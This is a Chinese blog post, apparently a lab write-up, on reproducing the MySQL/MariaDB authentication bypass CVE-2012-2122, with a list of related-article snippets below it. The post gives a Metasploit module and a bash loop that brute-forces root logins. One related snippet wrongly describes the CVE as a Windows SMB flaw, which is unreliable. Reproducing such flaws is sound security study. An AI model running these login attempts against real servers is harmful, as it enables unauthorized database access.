(CVE-2012-2122)MySql身份认证绕过漏洞

最新推荐文章于 2024-05-11 21:11:51 发布
最新推荐文章于 2024-05-11 21:11:51 发布
阅读量3.8k 收藏 2
点赞数 1
文章标签: mysql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52988674/article/details/122590810
版权

在数据库种类和版本在:

MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23

MySQL versions from 5.1.63, 5.5.24, 5.6.6

存在该漏洞,当只知道用户名为root的前提下,不断地尝试度登录,即使密码错误也有可能登陆成功,其概率大概为1 :216。

两种思路:

1.使用msf:

use scanner/mysql/mysql_authbypass_hashdump

使用msf的这个模块,然后只需要配置rhost,即目标机器ip地址,然后run或者exploit。

当然不知道为什么,我一直不行,可能是运气不好或者别的问题吧,因为我猜测其总共尝试次数不超过100次,当然你运气好应该能成功。

2.使用bash命令,循环尝试:

for i in `seq 1 1000`;do mysql -uroot -pwhatever -h ip -P 3306;done

推荐使用这个,当然靶机有可能报

rror: undefined method `encoding' for nil:NilClass

这是因为你尝试次数过多,然后靶机代码编写有点问题造成的,登录靶机数据库使用命令,

flush hosts;

然后再次尝试就行了。

注意,``不是单引号,然后第二个-P要大写,不然会出现一些耐人寻味的情况。

The_All_one
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
mysql 连续登陆漏洞_MySQL 严重 Bug - 用户登陆漏洞
weixin_39781550的博客
02-07 140
Security vulnerability in MySQL/MariaDB 在知道用户名的情况下(如root),直接反复重试(平均大约256次)即可登入。受影响的版本:All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.MariaDB versions from 5.1.62, 5....
mysql5.6漏洞_MySQL 5.6.24 Buffer Overflow
weixin_42297904的博客
01-18 822
===========================================================Advanced Information Security CorporationSecurity Advisory===========================================================a888b.d888888b.8P"YP"Y88...
MySQL 身份认证漏洞 CVE-2012-2122
MateSnake的博客
05-11 364
MySQL 身份认证漏洞复现 CVE-2012-2122
mysql漏洞包_【我是来捧场的】MySQL部分版本出现用户登陆漏洞
weixin_30093045的博客
02-02 165
该楼层疑似违规已被系统折叠隐藏此楼查看此楼MySQL部分版本出现用户登陆漏洞bug: Security vulnerability in MySQL/MariaDB sql/password.cSecurity vulnerability in MySQL/MariaDB 在知道用户名的情况下(如root),直接反复重试(平均大约256次)即可登入。受影响的版本:All MariaDB and ...
mysql 连续登陆漏洞,MySQL 紧急 Bug - 用户登陆漏洞
weixin_36259438的博客
03-17 192
MySQL 严重 Bug - 用户登陆漏洞Security vulnerability in MySQL/MariaDB 在知道用户名的情况下(如root),直接反复重试(平均大约256次)即可登入。受影响的版本:All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.MariaDB ver...
mysql绕过密码漏洞_php mysql任意密码漏洞以及解决办法
weixin_39989215的博客
02-08 278
/*** mysql任意密码漏洞** @param unknown_type $user* @param unknown_type $passwd* @return unknown*/public function getLogin( $user, $passwd ){$passwd = md5(md5(md5($_POST['pass'])));$where = "username = '{$u...
Mysql身份认证绕过漏洞CVE-2012-2122)复现
君莫hacker的博客
09-12 2479
0x01 漏洞介绍 漏洞描述 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。 漏洞编号 CVE-2012-2122 受影响版本 数据库 版本 MariaDB 5.1.62, 5.2.12, 5.3.6, 5.5.23 MySQL 5.1.63, 5.5.24, 5.6.6 0x02
oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip
01-19
CVE-2012-1675是一个特定的漏洞,它可能允许未经身份验证的远程攻击者执行代码或获取敏感信息,对系统的安全性构成威胁。 补丁“p12880299”是Oracle官方发布的一个修复程序,旨在修补CVE-2012-1675漏洞。补丁编号...
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)
07-17
直接使用java -jar srping....war命令运行即可 执行之后,访问http://主机的IP:8888/admin/*或者http://主机的IP:8888/login
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC
09-04
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, ...
Fatal error: session_start(): Failed to initialize storage module: files问题解决方法
12-18
之前编译安装的LNMP环境+phpmyamdin4.02的版本,今天突然出现这个问题:复制代码 代码如下:Fatal error: session_start(): Failed to initialize storage module: files (path: ) in /data/www/phpmyadmin/libraries/session.inc.php on line 83大致意思是session会话初始化的时候储存路径有误!第一反应就是查看php.ini的配置文件中的:复制代码 代码如下:session.save_path = “/tmp”默认前面是加的分号,表示不启用,我之前
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
MySQL的SQL语句
agurt80004的专栏
06-05 465
一、 MySQL概念 程序 =数据+指令构成,如果下载1个程序需要连带该程序所有代码+数据下载到本地,那这个程序运行起来势必造成本机内存压力暴涨,所以我们需要1个在远程server端帮我们管理数据的软件,程序通过客户端去连接server端socket,访问服务端数据库管理软件,按需获取和添加数据, 这种管理数据的软件有很多例如MySQL、Oracle、SQLServer........
CVE-2012-2122Mysql身份认证漏洞
weixin_45253622的博客
05-27 6363
目录 漏洞描述 影响版本 漏洞复现 使用MSF进行检测: 使用Linux执行命令进行爆破复现: ​使用python脚本进行复现: 漏洞修复 漏洞描述 当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 影响版本 MariaDB versions from 5.1...
msf攻击mysql_authbypass_hashdump漏洞
每天累计一滴水 十天后变成一大滴水 一百天后变成一杯水
10-06 765
我是用的是vulhub进行漏洞环境搭建,具体怎么搭建我在这儿就不说了,我主要讲下如果使用msf进行攻击的,过程相当简单~~~
关于undefined method `each‘ for nil:NilClass的报错
weixin_43925467的博客
05-05 6162
有关错误的解决 发现是这里的articles少打了一个s 导致这里出现错误 @前缀表示实例变量,因为列出文章是负数,此时这里要是负数。@@是类变量,类似全局变量,各个类之间共享。
MySql身份认证绕过漏洞(CVE-2012-2122)
dgjkkhcf的博客
07-24 4665
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。.........
cve-2012-2122
最新发布
06-14
CVE-2012-2122是一个知名的计算机安全漏洞,它影响了Microsoft Windows操作系统中的远程代码执行功能。这个漏洞通常被称为“MS12-020”或“Windows SMBGhost”,漏洞存在于Server Message Block (SMB) 协议的某些...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

The_All_one

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值